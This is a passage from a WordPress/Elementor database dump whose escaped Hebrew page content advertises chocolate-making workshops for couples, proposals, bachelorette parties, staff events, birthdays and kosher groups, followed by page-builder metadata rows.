\\u05e9\\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05e9\\u05dc\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05d6\\u05d4, \\u05e2\\u05dc \\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc\\u05d5 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d8\\u05e2\\u05dd \\u05d5\\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05d9\\u05dd. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd \\u05d5\\u05de\\u05e4\\u05e0\\u05e7\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2 \\u05e9\\u05ea\\u05dc\\u05de\\u05d3 \\u05d0\\u05d5\\u05ea\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05d8\\u05e8\\u05d9\\u05e4\\u05d9\\u05dd \\u05e9\\u05d9\\u05e9.\\u00a0<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4, \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05de\\u05d9\\u05e0\\u05d4<\\/h2><p>\\u05d0\\u05d7\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4. <br \\/>\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05e8\\u05d1\\u05d9\\u05dd \\u05d1\\u05d5\\u05d7\\u05e8\\u05d9\\u05dd \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d0\\u05ea \\u05d4\\u05d9\\u05d5\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05d1\\u05d3\\u05e8\\u05da \\u05e7\\u05e6\\u05ea \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d9\\u05d2\\u05e8\\u05ea\\u05d9\\u05ea \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05d4\\u05d9\\u05d0 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05de\\u05e4\\u05e0\\u05e7\\u05ea, \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea, \\u05d5\\u05de\\u05ea\\u05d1\\u05e1\\u05e1\\u05ea \\u05db\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9 \\u05ea\\u05d0\\u05d1\\u05d4. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05d4\\u05db\\u05dc \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05de\\u05e4\\u05e0\\u05e7\\u05ea.<\\/p><h2>\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05e6\\u05e2\\u05d4 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\u05de\\u05d9 \\u05de\\u05db\\u05dd \\u05e9\\u05de\\u05d7\\u05e4\\u05e9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05e2\\u05d5\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05de\\u05d5\\u05d6\\u05de\\u05df \\u05dc\\u05ea\\u05db\\u05e0\\u05df \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. <br \\/>\\u05d9\\u05e9\\u05e0\\u05df \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d3\\u05e8\\u05db\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d4\\u05e6\\u05d9\\u05e2 \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df, \\u05d5\\u05db\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d4\\u05d9\\u05d0 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d0\\u05d1\\u05dc \\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d0\\u05d5 \\u05de\\u05e9\\u05e4\\u05d7\\u05ea\\u05d9\\u05ea, \\u05db\\u05e9\\u05d4\\u05d8\\u05d1\\u05e2\\u05ea \\u05e6\\u05e6\\u05d4 \\u05e4\\u05ea\\u05d0\\u05d5\\u05dd \\u05de\\u05ea\\u05d5\\u05da \\u05d0\\u05d7\\u05d3 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd, \\u05d4\\u05d9\\u05d0 \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05de\\u05d7\\u05d5\\u05d5\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05e9\\u05dc\\u05d0 \\u05ea\\u05e9\\u05db\\u05d7 \\u05dc\\u05e2\\u05d5\\u05dc\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea<\\/h2><p>\\u05d0\\u05dd \\u05d0\\u05ea\\u05df \\u05e2\\u05d5\\u05de\\u05d3\\u05d5\\u05ea \\u05dc\\u05d4\\u05ea\\u05d7\\u05ea\\u05df \\u05de\\u05de\\u05e9 \\u05d1\\u05e7\\u05e8\\u05d5\\u05d1, \\u05d5\\u05de\\u05d7\\u05e4\\u05e9\\u05d5\\u05ea \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. <br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8. <br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2290,431,'_elementor_edit_mode','builder'),(2291,431,'_elementor_template_type','wp-page'),(2292,431,'_elementor_version','2.7.5'),(2293,431,'_elementor_pro_version','2.7.3'),(2294,431,'_wp_page_template','elementor_header_footer'),(2295,431,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2296,431,'_elementor_data','[{\"id\":\"e02bb57\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c37663b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9a95b77\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea 